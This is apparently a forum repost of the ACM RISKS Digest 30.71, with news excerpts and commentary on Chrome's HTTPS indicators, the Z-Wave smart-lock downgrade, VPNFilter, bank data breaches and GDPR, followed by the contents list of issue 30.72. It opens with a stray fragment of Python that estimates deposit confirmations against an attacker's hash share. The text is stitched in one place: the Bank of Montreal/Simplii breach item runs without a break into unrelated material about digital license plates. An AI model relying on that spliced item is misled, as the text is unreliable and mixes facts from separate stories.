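    for q in shares:
        print(f"attacker share {q:.2f}: confirmations =",
              deposit_policy(1000.0, q, 1.0))
```

    The table reproduces the whitepaper's values for q = 0.1 and q = 0.3, and
    the 0.51 column is 1.0 at every depth, which is why Bitcoin Gold's exchanges
    could not defend by waiting longer.

    ------------------------------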

    Date: Sat, 26 May 2018 18:03:44 -0600
    From: "Keith Medcalf" <kmed...@dessus.com>
    Subject: Google to remove "secure" indicator from HTTPS pages on Chrome

    Google should be keelhauled for this (or at least the dolts who thought it
    up should be keelhauled, and the sailors doing the hauling should be given
    three toddies of rum when the googlers are half-way along the keel). HTTPS
    does not mean that the Web Site is secure. It means that it is transport
    encrypted. Similarly, that the web site is not using SSL/TLS does not mean
    it is insecure -- it simply means that the transport is not encrypted.

    There is a *LOT* more to being *secure* than merely engaging transport
    security. It should be noted that Google will not detect "forged" or MITM
    certificates, and that as a result much of what they hold out as "secure"
    actually does not even have meaningful transport security.

    ------------------------------

    Date: Fri, 18 May 2018 09:13:42 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: Google to remove `secure' indicator from HTTPS pages on Chrome
    (ZDNet)

    [In other news, your local second-level (province, state, prefecture,
    etc.) government announced plans to remove those curve speed caution signs
    to make the roads safer. Well, not actually. They have a bit more sense
    than Google. GW]

    http://www.zdnet.com/article/google-to-remove-secure-indicator-from-https-pages-on-chrome/

    Stephanie Condon, ZDNet, 17 May 2018
    Google to remove "secure" indicator from HTTPS pages on Chrome
    Users should expect the web to be safe by default, Google explained.

    As part of its push to make the web safer, Google on Thursday said it will
    stop marking HTTPS pages as "secure."

    The logic behind the move, Google explained, is that "users should expect
    that the web is safe by default." It will remove the green padlock and
    "secure" wording from the address bar beginning with Chrome 69 in September.

    ------------------------------

    Date: 28 May 2018 11:45:16 -0400
    From: "John Levine" <jo...@iecc.com>
    Subject: Google to remove "secure" indicator from HTTPS pages on Chrome
    (ZDNet)

    Google previously announced that it would mark HTTP pages as "not
    secure" beginning with Chrome 68 in July.

    By October with Chrome 70, Google will start showing a red "not
    secure" warning when users enter data on HTTP pages. "Previously, HTTP
    usage was too high to mark all HTTP pages with a strong red warning,"
    Google said.

    ------------------------------

    Date: Sun, 27 May 2018 08:54:17 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "How your web browser tells you when it's safe" (Gregg Keizer)

    Gregg Keizer, Computerworld, 23 May 2018
    https://www.computerworld.com/artic...your-web-browser-tells-you-when-its-safe.html

    As Google moves to change how its Chrome browser flags insecure websites,
    rival browsers may be forced to follow suit. Here's how other browsers
    currently handle website security and what changes they have coming.

    selected text:

    Google last week spelled out the schedule it will use to reverse years of
    advice from security experts when browsing the Web - to "look for the
    padlock." Starting in July, the search giant will mark insecure URLs in its
    market-dominant Chrome, not those that already are secure. Google's goal?
    Pressure all website owners to adopt digital certificates and encrypt the
    traffic of all their pages.

    Security pros praised Google's campaign, and the probable end-game. "I
    won't have to tell my mom to look for the padlock," said Chester Wisniewski,
    principal research scientist at security firm Sophos, of the
    switcheroo. "She can just use her computer."

    [Let us change stuff for the people who do not know much about computers.
    That will make things simpler for them. These two sentences do not belong
    together.]

    But what are Chrome's rivals doing? Marching in step or sticking to
    tradition? Computerworld fired up the Big Four -- Chrome, Mozilla's Firefox,
    Apple's Safari and Microsoft's Edge -- to find out.

    ------------------------------

    Date: Sun, 27 May 2018 09:07:11 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Smart lock user? Z-wave pairing flaw lets attackers open your doors
    from yards away" (Liam Tung)

    Liam Tung, ZDNet, 25 May 2018
    https://www.zdnet.com/article/smart...ets-attackers-open-your-door-from-yards-away/
    Up to 100 million Internet of Things devices could be at risk.

    starting text:

    Hackers may be able to remotely unlock your smart lock if it relies on the
    Z-Wave wireless protocol.

    According to researchers at UK firm Pen Test Partners, Z-Wave is vulnerable
    to an attack that forces the current secure pairing mechanism, known as S2,
    to an earlier version with known weaknesses, called S0.

    The problem with S0 is that when two devices, like a controller and a smart
    lock, are pairing, it encrypts the key exchange using a hardcoded key
    '0000000000000000'. So, an attacker could capture traffic on the network and
    easily decrypt it to discover the key.

    S2 fixed this problem by employing the Diffie-Hellman algorithm for securely
    sharing secret keys, but the downgrade removes that protection.

    The researchers have posted a video demonstrating the downgrade attack --
    dubbed Z-Shave -- on a Conexis L1 Smart Door Lock from lock manufacturer
    Yale. They note that an attacker within about 100 meters could, after the
    downgrade attack, then steal the keys to the smart lock.

    Z-Wave chips are in 100 million smart gadgets, from lights to heating
    systems, but the risk is greater for things with security applications, such
    as locks.

    ------------------------------

    Date: May 27, 2018 at 9:56:50 AM EDT
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: FBI tells router users to reboot now to kill malware infecting 500k
    devices (Dan Goodin)

    Feds take aim at potent VPNFilter malware allegedly unleashed by Russia.
    Dan Goodin, Ars Technica, 25 May 2018

    http://arstechnica.com/information-...t-now-to-kill-malware-infecting-500k-devices/

    The FBI is advising users of consumer-grade routers and network-attached
    storage devices to reboot them as soon as possible to counter
    Russian-engineered malware that has infected hundreds of thousands of devices.

    Researchers from Cisco's Talos security team first disclosed the
    existence of the malware on Wednesday. The detailed report said the malware
    infected more than 500,000 devices made by Linksys, Mikrotik, Netgear, QNAP,
    and TP-Link. Known as VPNFilter, the malware allowed attackers to collect
    communications, launch attacks on others, and permanently destroy the
    devices with a single command. The report said the malware was developed by
    hackers working for an advanced nation, possibly Russia, and advised users
    of affected router models to perform a factory reset, or at a minimum to
    reboot. Later in the day, The Daily Beast reported that VPNFilter was indeed
    developed by a Russian hacking group, one known by a variety of names,
    including Sofacy, Fancy Bear, APT 28, and Pawn Storm. The Daily Beast also
    said the FBI had seized an Internet domain VPNFilter used as a backup means
    to deliver later stages of the malware to devices that were already infected
    with the initial stage 1. The seizure meant that the primary and secondary
    means to deliver stages 2 and 3 had been dismantled, leaving only a third
    fallback, which relied on attackers sending special packets to each infected
    device.

    Limited persistence

    The redundant mechanisms for delivering the later stages address a
    fundamental shortcoming in VPNFilter -- stages 2 and 3 can't survive a
    reboot, meaning they are wiped clean as soon as a device is
    restarted. Instead, only stage 1 remains. Presumably, once an infected
    device reboots, stage 1 will cause it to reach out to the recently seized
    ToKnowAll.com address. The FBI's advice to reboot small office and home
    office routers and NAS devices capitalizes on this limitation. In a
    statement published Friday, FBI officials suggested that users of all
    consumer-grade routers, not just those known to be vulnerable to VPNFilter,
    protect themselves. The officials wrote:

    The FBI recommends any owner of small office and home office routers reboot
    the devices to temporarily disrupt the malware and aid the potential
    identification of infected devices. Owners are advised to consider disabling
    remote management settings on devices and secure with strong passwords and
    encryption when enabled. Network devices should be upgraded to the latest
    available versions of firmware.

    In a statement also published Friday, Justice Department officials wrote:

    Owners of SOHO and NAS devices that may be infected should reboot their
    devices as soon as possible, temporarily eliminating the second stage
    malware and causing the first stage malware on their device to call out
    for instructions. Although devices will remain vulnerable to reinfection
    with the second stage malware while connected to the Internet, these
    efforts maximize opportunities to identify and remediate the infection
    worldwide in the time available before Sofacy actors learn of the
    vulnerability in their command-and-control infrastructure.

    The US Department of Homeland Security has also issued a statement advising
    that "all SOHO router owners power cycle (reboot) their devices to
    temporarily disrupt the malware."

    As noted in the statements, rebooting serves the objectives of (1)
    temporarily preventing infected devices from running the stages that collect
    data and other advanced attacks and (2) helping FBI officials to track who
    was infected. Friday's statement said the FBI is working with the non-profit
    Shadow Foundation to disseminate the IP addresses of infected devices to
    ISPs and foreign authorities to notify end users.

    Authorities and researchers still don't know for certain how compromised
    devices are initially infected. They suspect the attackers exploited known
    vulnerabilities and default passwords that end users had yet to patch or
    change. That uncertainty is likely driving the advice in the FBI statement
    that all router and NAS users reboot, rather than only users of the 14
    models known to be affected by VPNFilter [...]

    ------------------------------

    Date: Sun, 27 May 2018 13:25:03 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Banks Adopt Military-Style Tactics to Fight Cybercrime (NYTimes)

    *The New York Times*

    ``Those are the decisions you don't want to be making for the first time
    during a real attack,'' said Bob Stasio, IBM's cyber range operations
    manager and a former operations chief for the National Security Agency's
    cyber center. One financial company's executive team did such a poor job of
    talking to its technical team during a past IBM training drill, Mr. Stasio
    said, that he went home and canceled his credit card with them.

    Like many cybersecurity bunkers, IBM's foxhole has deliberately theatrical
    touches. Whiteboards and giant monitors fill nearly every wall, with
    graphics that can be manipulated by touch.

    ``You can't have a fusion center unless you have really cool TVs,'' quipped
    Lawrence Zelvin, a former Homeland Security official who is now Citigroup's
    global cybersecurity head, at a recent cybercrime conference. ``It's even
    better if they do something when you touch them. It doesn't matter what
    they do. Just something.''

    Security pros mockingly refer to such eye candy as `pew pew' maps, an
    onomatopoeia for the noise of laser guns in 1980s movies and video
    arcades. They are especially useful, executives concede, to put on display
    when V.I.P.s or board members stop by for a tour. Two popular pew maps are
    from FireEye https://www.fireeye.com/cyber-map/threat-map.html and the
    defunct security vendor Norse http://www.norsecorp.com/ whose video
    game-like maps show laser beams zapping across the globe. Norse went out of
    business two years ago, and no one is sure what data the map is based on,
    but everyone agrees that it looks cool.

    http://www.nytimes.com/2018/05/20/business/banks-cyber-security-military.html

    ------------------------------

    Date: Sun, 27 May 2018 16:26:44 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: How One Company Scammed Silicon Valley. And How It Got Caught.
    (John Carreyrou)

    BAD BLOOD
    John Carreyrou
    Secrets and Lies in a Silicon Valley Startup
    352 pp. Alfred A. Knopf. $27.95.
    *The New York Times* Book Review
    http://www.nytimes.com/2018/05/21/books/review/bad-blood-john-carreyro

    "Despite warnings from employees that Theranos wasn't ready to go live on
    human subjects -- its devices were likened to an eighth-grade science
    project -- Holmes was unwilling to disappoint investors or her commercial
    partners. The result was a fiasco. Samples were stored at incorrect
    temperatures. Patients got faulty results and were rushed to emergency
    rooms. People who called Theranos to complain were ignored; employees who
    questioned its technology, its quality control or its ethics were
    fired. Ultimately, nearly a million tests conducted in California and
    Arizona had to be voided or corrected."

    Investors and personalities enamored by technological wizardry, though based
    on fundamentally fraudulent solutions, were suckered in by Theranos' promise
    to revolutionize routine blood tests with a few tiny blood droplets from a
    pinprick. ~US$ 1B dropped on a real "unicorn" sighting.

    The Theranos founder, Elizabeth Holmes, preferred sycophants and colleagues
    who possessed 110-ohm noses (striped brown-brown-brown per the Resistor
    color code) that kissed her fanny. Findings and facts that disputed her
    vision were concealed from investors. Knowing how to ask the right questions
    remains a valuable skill to possess.

    When an ethical, professional engineer confronts a situation of this nature,
    there are few alternatives to pursue: (a) become a whistle-blower; (b)
    continue to document findings that support legal discovery and a fraud
    investigation while holding your nose and tongue; or, (c) jump ship at the
    earliest opportunity.

    If something appears too good to be true, it is likely the case.
    P.T. Barnum, the circus entrepreneur, is reputed to have said, "There's a
    sucker born every minute." An aphorism that remains prescient today for the
    incurious or greedy.

    ------------------------------

    Date: Sun, 27 May 2018 17:30:59 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Jaron Lanier: How Can We Repair The Mistakes Of The Digital Era? (NPR)

    https://www.npr.org/templates/transcript/transcript.php?storyId=6140792

    Get out your checkbook or boost your PayPal account balance. All the free
    services "enjoyed" today, that exploit volunteered information for a little
    dopamine, will shift to a subscription or micropayment model.

    The Internet as a true utility, like the water and power that comes out of
    the wall, billed per bit. Internet disenfranchisement is likely to evolve if
    meter ticks attributed to premium information become unaffordable.

    Will governments introduce a subsidy -- a new entitlement -- to boost the
    information "have-nots" into a realm approximating the "haves"? Or will there
    be a multi-tier model -- surrender your data for 24x7 tracking and attention
    whipsaw for free, versus pay for the right to volunteer data with an
    explicit opt-in (EU ePrivacy) granting license and viewing preferences as
    the product?

    ------------------------------

    Date: Mon, 28 May 2018 08:05:13 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: YouTube stars' fury over algorithm tests (BBC.com)

    http://www.bbc.com/news/technology-44279189

    'Originally, the YouTube subscription feed was a chronological list of
    videos from all the channels that a person had chosen to "subscribe"
    to. The system let people curate a personalised feed full of content from
    their favourite video-makers.

    'However, many video-makers have previously complained that some of their
    videos have not appeared in the subscription feed, and have questioned
    whether YouTube manipulates the list to boost viewer retention and
    advertising revenue.

    'YouTube's latest experiment -- which it said appeared for a "small number"
    of users -- changed the order of videos in the feed. Instead of showing the
    most recent videos at the top, YouTube said the manipulated feed showed
    people "the videos they want to watch".'

    Algorithmic refactoring experiment adjusts video delivery order.
    YouTube apparently 'wins' over content creator/copyright owners,
    despite subscription historical preference and profile settings.

    ------------------------------

    Date: Tue, 29 May 2018 16:10:52 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Amazon Toilet Paper Order of Over $7,000 Refunded 2 Months Later
    (Fortune)

    http://fortune.com/2018/05/25/woman-charged-7000-for-toilet-paper-ordered-amazon-refunded/

    The risk? Online/automated/robot cashiers. Same as my grocery store
    self-checkout charged me for 22 avocados instead of 2. At least I could get
    a quick refund from on-scene humans.

    ------------------------------

    Date: Tue, 29 May 2018 17:14:58 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: Amazon's Echo privacy flub has big implications for IT (Evan Schuman)

    Evan Schuman, *Computerworld*, 26 May 2018
    https://www.computerworld.com/artic...privacy-flub-has-big-implications-for-it.html

    Amazon has confirmed that one of its Echo devices recorded a family's
    conversation and then messaged it to a random person on the family's contact
    list. The implications are terrifying.

    ------------------------------

    Date: Tue, 29 May 2018 17:34:18 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Bank of Montreal, CIBC's Simplii Financial report customer data
    breaches" (Asha McLean)

    Asha McLean, ZDNet, 29 May 2018
    http://www.zdnet.com/article/bank-o...lii-financial-confirm-customer-data-breaches/

    Bank of Montreal, CIBC's Simplii Financial report customer data breaches

    The Canadian banks have reported being contacted by external 'fraudsters'
    claiming to have accessed information on an estimated 90,000 customers. The
    trial appears to be limited to 24 plates.

    The plates are digital displays that can be updated and modified remotely.
    Therefore, they can be updated immediately once car registration is updated.
    They can also be used to "broadcast" messages such as emergency and amber
    alerts, and can be set to display personal messages when the car is not in
    motion.

    http://www.dailymail.co.uk/sciencet...l-license-plates-allow-police-track-move.html
    or https://is.gd/NRJ4Ey

    The plates also broadcast information to sensors in or beside roads, and can
    communicate with each other.

    I trust it is not too difficult to point out the huge numbers of ways these
    plates could be attacked or misused.

    Asha McLean, ZDNet, 1 Jun 2018
    CBA sent over 650 emails holding data on 10k customers in error. The bank
    has admitted discovering an issue with emails going to incorrect addresses.
    https://www.zdnet.com/article/cba-sent-over-650-emails-holding-data-on-10k-customers-in-error/

    opening text:

    The Commonwealth Bank of Australia (CBA) has once again found itself in the
    spotlight for the potential mishandling of customer information, admitting
    it had sent over 650 incorrectly addressed internal emails.

    The bank said on Friday it had completed an investigation that was initiated
    after a concern was raised about internal CBA emails being inadvertently
    sent to email addresses using the cba.com domain, prior to taking ownership
    of that domain in April 2017.

    Its usual email domain is cba.com.au.

    ------------------------------

    Date: Thu, 31 May 2018 07:21:49 +0800
    From: Jeremy Ardley <jer...@ardley.org>
    Subject: License Plate Risks

    Two different dynamically changeable number plates.

    The traditional:
    http://www.youtube.com/watch?v=wSFXyIlq5xw

    The $699 plus $7/month electronic paper version issued by the California
    Department of Motor Vehicles:


    I leave it as an exercise for the reader as to what risks exist in
    either. Aside, that is, from pointing out the stupidity of an electronic tag
    in the age of high quality Automatic Number Plate Recognition systems linked
    to a licensing computer.

    However, there is a second risk in being able to detect unlicensed vehicles;
    work overload. The Western Australian Police have had to turn off the
    unlicensed vehicle feature in their ANPR system because there are too many
    alerts!

    "WA Police 'can't cope' with high number of auto-detect car registration
    alerts"

    http://www.abc.net.au/news/2014-06-17/end-of-the-road-for-police-alert-software/5528160

    ------------------------------

    Date: Wed, 30 May 2018 18:37:19 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: "Jira bug exposed private server keys at major companies,
    researcher finds" (Zack Whittaker)

    Zack Whittaker, ZDNet, 30 May 2018
    https://www.zdnet.com/article/jira-...ver-keys-at-major-companies-researcher-finds/

    Jira bug exposed private server keys at major companies, researcher finds

    A major TV network, a UK cell giant, and one US government agency are among
    the companies affected.

    ------------------------------

    Date: Thu, 31 May 2018 19:39:42 -0400
    From: José María Mateos <ch...@rinzewind.org>
    Subject: Google Started a Political Sh*tstorm Because of Its Over-Reliance
    on Wikipedia (Motherboard)

    https://motherboard.vice.com/en_us/article/435n9j/google-republicans-are-nazis-explanation

    As VICE News reported earlier Thursday, a Google search for `California
    Republican Party' resulted in Google listing `Nazism' as the ideology of the
    party. This happened because of Google's Featured Snippets tool, which pulls
    basic information for search terms and puts it on the front page. These are
    also sometimes called Google Cards and Knowledge Panels.

    The information on these cards is often taken from Wikipedia entries, which
    is what seems to have happened here. Six days ago, someone edited the
    Wikipedia page for `California Republican Party' to include `Nazism',
    something that wasn't changed until Wednesday, Wikipedia's edit logs show.

    You take content from another site and put it into yours and pretend it's
    "the truth", and all that is an automated process. Can't see what might go
    wrong there.

    ------------------------------

    Date: Fri, 01 Jun 2018 15:36:42 -0700
    From: RICHARD M STEIN <rms...@ieee.org>
    Subject: Signs of sophisticated cellphone spying found near White House,
    U.S. officials say (WaPo)

    https://www.washingtonpost.com/news...use-say-u-s-officials/?utm_term=.3cff9618ae33

    "A federal study found signs that surveillance devices for intercepting
    cellphone calls and texts were operating near the White House and other
    sensitive locations in the Washington area last year."

    Only Rip Van Winkle would have been surprised by this headline. What
    precautions are the SIGINT targets using to forestall intercept? Are
    they effective, or have they been compromised too? Whatever happened to
    good ol' "Blackbag" jobs?

    ------------------------------

    Date: Fri, 1 Jun 2018 14:04:19 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Massive Visa Outage Shows the Fragility of Global Payments (WiReD)

    NNSquad
    https://www.wired.com/story/visa-outage-shows-the-fragility-of-global-payments/

    On Friday, VISA'S payment network suffered outages across Europe, limiting
    transactions for both businesses and individuals. Banks and commerce
    groups began advising customers to use cash or other payment cards if
    possible, and reports indicated that online and contactless transactions
    were having more success than chip cards. Though some Visa transactions
    still went through, the failure appeared widespread. The Financial Times
    even reported that some ATMs in the United Kingdom were already out of
    cash within a couple of hours of the first outage reports. Some observers
    saw in the outage a stark reminder of the fragility of payment networks,
    and the weaknesses in global economic platforms.

    ------------------------------

    Date: Sat, 2 Jun 2018 02:01:55 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: How can criminals manipulate cryptocurrency markets?
    (The Conversation)

    https://theconversation.com/how-can-criminals-manipulate-cryptocurrency-markets-97294

    ------------------------------

    Date: Fri, 25 May 2018 18:32:06 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Ad Blocker Ghostery Celebrates GDPR Day by Revealing Hundreds
    of User Email Addresses (Gizmodo)

    via NNSquad [Thanks, EU!]
    http://gizmodo.com/ad-blocker-ghostery-celebrates-gdpr-day-by-revealing-hu-1826338313

    Ad-blocking tool Ghostery suffered from a pretty impressive,
    self-inflicted screwup Friday when the privacy-minded company accidentally
    CCed hundreds of its users in an email, revealing their addresses to all
    recipients. Fittingly, the inadvertent data exposure came in the form of
    an email updating Ghostery users about the company's data collection
    policies. The ad blocker was sending out the message to affirm its
    commitment to user privacy as the European Union's digital privacy law,
    known as the General Data Protection Regulation (GDPR), goes into effect.
    The email arrived in inboxes with the subject line "Happy GDPR Day --
    We've got you covered!" In the body of the email, the company informed
    users, "We at Ghostery hold ourselves to a high standard when it comes to
    users' privacy, and have implemented measures to reinforce security and
    ensure compliance with all aspects of this new legislation."

    ------------------------------

    Date: Sun, 27 May 2018 13:30:02 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Commentary: GDPR Misses the Point (Fortune)

    http://fortune.com/2018/05/24/gdpr-data-privacy-cookies/

    ------------------------------

    Date: Sun, 3 Jun 2018 12:08:40 -0700
    From: Rob Slade <rms...@shaw.ca>
    Subject: GDPR, Privacy, and CISSPforum vs "Community"

    The long running CISSPforum mailing list on Yahoo Groups is being closed by
    ISC2, effective June 15, 2018. An alternate mailing list, run by volunteer
    CISSPs, has been created on groups.io.

    Yeah, I know. Those of you who don't have the CISSP cert don't care. (Even
    those who, like Peter, have been given an honorary CISSP may not care.) But
    the reason the CISSPforum is being closed is kind of interesting.

    ISC2 itself isn't saying much about why. But most people discussing it seem
    to think it has to do with GDPR. Yahoo has not had the greatest success
    with security, so ISC2 may wish to limit its exposure.

    The thing is, if I want to give people instructions on getting to the new
    CISSPforum, the easiest thing would be to send them to the page at
    https://community.isc2.org/t5/Welcome/CISSPforum-replacement/td-p/11006 (or
    https://is.gd/lGXNgT if email mungs that and you want a shortened version).
    Yes, you are correct. That Web page is one of the postings on the new,
    supposedly private, "community" that ISC2 has created to replace the
    CISSPforum mailing list as a communications venue for the membership.

    And, if I want to send you to the existing discussion of the various privacy
    issues to do with the new "community," I can point you to
    https://community.isc2.org/t5/Welco...censorship-Closing-of-CISSP/td-p/11021/page/2
    or http://is.gd/GgHckH Or, you can search for it yourself, on Google:
    http://lmgtfy.com/?q=see+the+amazing+dancing+CISSPs+and+all+their+discussions

    You will be able to see all kinds of discussion on the new forum. Do a
    Google search with any term you want, and include site:community.isc2.org as
    a term, and see what the amazing dancing CISSPs have said about it. (There
    is one area of the "community" that is not searchable, but it's fairly
    small.)

    ------------------------------

    Date: Sun, 3 Jun 2018 19:24:04 -0400
    From: José María Mateos <ch...@rinzewind.org>
    Subject: German spy agency can keep tabs on Internet hubs: court (Phys)

    http://phys.org/news/2018-05-german-spy-agency-tabs-internet.html

    De-Cix, the world's largest Internet hub, says Germany's spy agency is able
    to get a complete and unfiltered copy of all the data passing through its
    fibre optic cables.

    Germany's spy agency can monitor major Internet hubs if Berlin deems it
    necessary for strategic security interests, a federal court has ruled.

    In a ruling late on Wednesday, the Federal Administrative Court threw out a
    challenge by the world's largest Internet hub, the De-Cix exchange, against
    the tapping of its data flows by the BND foreign intelligence service.

    The operator had argued the agency was breaking the law by capturing German
    domestic communications along with international data.

    http://rinzewind.org/blog-es

    ------------------------------

    Date: Sat, 26 May 2018 13:02:30 -0400
    From: John Ohno <john...@gmail.com>
    Subject: Trendism and cognitive stagnation

    Originally posted here:


    Trendism & cognitive stagnation

    (This is a follow-up to Against Trendism)

    Basing visibility on popularity is a uniquely awful version of *tyranny of
    the majority* because uncommon views become invisible, even if, were they to
    start on an even playing field, they would become popular.

    In this way, it encourages mental stasis: since ranking is based on an
    immediate appraisal of how popular something already is, and visibility is
    based therefore on past shallow popularity, there's no room for
    rumination.

    This is NOT an attribute of `technology' or `social media', but an attribute
    of visibility systems based on immediate ranking. Visibility systems based
    on ranking delayed by, say, three days, or with the top 25% most popular
    posts elided, would be fine.

    Our capacity to imagine new possibilities is based largely on our
    familiarity with the bounds of possibility space -- we can only
    imagine views that are in the neighborhood of views we've heard
    expressed in the past. So, making the already-unpopular invisible limits
    imagination.

    (There are hacks we can use to make it possible to imagine views nobody has
    ever held. We can make random juxtapositions, impose meaning on them, and
    then figure out a justification for them -- like tarot reading. Or,
    we can merely iterate from some basic idea, getting more and more extreme,
    while internalizing the perspective of each iteration as something someone
    could possibly believe in good faith. The former -- the bibliomancy
    approach -- is common in experimental art, while the latter is
    typical of dystopian science fiction.

    But, these hacks are pretty limited. We need a starting place. If
    we've only heard mainstream ideas, we're going to have a
    hard time going off the beaten path with the dystopia approach, while we
    will struggle with the bibliomancy approach because most ideas can only be
    made to seem reasonable with the help of other ideas. Getting into uncharted
    territories with either of these approaches is difficult unless
    you've already filled out the middle of your possibility space with
    other ideas, because in their absence you would need to independently
    reinvent them.)

    This is not a justification, in and of itself, for banning metrics entirely.
    After all, this kind of exponential distribution happens with ideas even
    without the use of popularity signifiers: ideas spread, and popular ideas
    have more opportunities to spread. Trendism merely accelerates the process
    and widens the gap between the most popular ideas and everything else.

    Sites like reddit use segmentation to prevent total ordering of popularity
    from dominating, although this ultimately means that popular subreddits have
    a disproportionate impact on this total ordering when it is seen.
    http://redditp.com/r/all

    Similarly, we have seen piecemeal attempts to limit the effects of trendism
    for particular topics -- the curation of trending topics at twitter and
    facebook, for instance, or ad-hoc ranking demerits for particular tags on
    lobste.rs.

    However, we could be applying the measurements we already take to counteract
    trendism rather than accelerating it: making popularity count less the
    higher it gets, removing overly-popular content entirely, boosting the
    visibility of mostly-unseen content, using information about organic reach
    in sites like twitter to boost the synthetic reach of people who
    don't have many followers (instead of boosting the synthetic reach
    of the rich), systematically demoting posts that comment on trending topics,
    spotlighting spotify tracks and youtube videos with zero views, and so on.

    Where trendism devalues the function of recommendation systems as novelty
    aggregators, these tools could be modified to be anti-trendist, pro-novelty,
    and promote a cosmopolitanism that broadens our horizons in ways traditional
    word-of-mouth never could. This is a unique capacity of recommendation
    systems over curators: recommendation systems can recommend things nobody
    has ever seen, and can recommend them on the grounds that nobody has seen
    them.

    ------------------------------

    Date: Mon, 28 May 2018 09:38:16 +0300
    From: Amos Shapir <amo...@gmail.com>
    Subject: Re: Securing Elections

    I don't wish to start a political argument, but from a practical POV, there
    is merit to the US method of "the winner takes it all" -- eventually, one
    candidate wins, and incumbents should be let to do their job to the best of
    their ability. Compare that to relational methods in some European
    countries, which have brought about unstable governments which are
    reshuffled often (like in France before the 1968, or current Italy).

    History has proven -- from the resignation of Nixon to the recent upheaval in
    Armenia -- that as long as freedom of expression and assembly are kept, the
    public would eventually be able to express enough dissent to get rid of
    corrupt politicians, no matter which system was used to elect them in the
    first place.

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!
    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.71
    ************************
     
  6. LakeGator

    Risks Digest 30.72

    RISKS List Owner

    Jun 12, 2018 8:07 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Tuesday 12 June 2018 Volume 30 : Issue 72

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Another risk of driverless cars (PGN)
    Emirates looks to windowless planes (bbc.com)
    180,000 Voters accidentally left off LA County polling place rosters
    (Irfan Khan)
    Ontario election results Not a Number (Tony Marmic)
    Florida skips gun background checks for a year after employee forgets login
    (Naked Security)
    All accredited journalists at the #KimTrumpSummit get a free USB fan
    (YCombinator)
    Israelis nabbed in Philippines are tip of iceberg in alleged fraud
    gone global (The Times of Israel)
    Sweden Tries to Halt Its March to Total Cashlessness (Bloomberg)
    Cryptocurrencies Lose Billions In Value After An Exchange Is Hacked
    "Cryptocurrency theft malware is now an economy worth millions" (NPR)
    Quebec Halts Bitcoin Mining Power Requests Amid Booming Demand
    (Charlie Osborne)
    The Spanish Liga uses the phone microphone of millions of fans
    to spy on bars (El Diario)
    Navy Contractor Hacked: Reams of Secret Documents Taken (WashPo)
    G Suite leaks in 10,000+ orgs: Google UX blamed, fury at no-bug defense
    (TechBeacon)
    "Password reset flaw at Internet giant Frontier allowed account takeovers"
    (Zack Whittaker)
    Why a DNA data breach is much worse than a credit card leak (The Verge)
    "Facebook gave some companies extended access to user data"
    (Stephanie Condon)
    Facebook bug made up to 14 million users' posts public for days (WiReD)
    "Cisco fixes critical bug that exposed networks to hackers"
    (Zack Whittaker)
    "Meet Norman, the world's first 'psychopathic' AI" (Charlie Osborne)
    Should We Always Trust What We See in Satellite Images?
    (Scientific American)
    The NSA Just Released 136 Historical Propaganda Posters (Motherboard)
    Unproven facial-recognition companies target schools, promising an
    end to shootings (WashPo)
    The Zip Slip vulnerability: what you need to know (Naked Security)
    All the people Apple just pissed off to better protect your privacy
    (Fast Company)
    Recounting 'Horror Stories' Over Guitar Center's Warranties (NYT)
    Add Bryan Colangelo to the long list who have been burned by social media
    (ESPN)
    Microsoft, Github, & distributed revision control (Medium)
    How the body could power pacemakers and other implantable devices
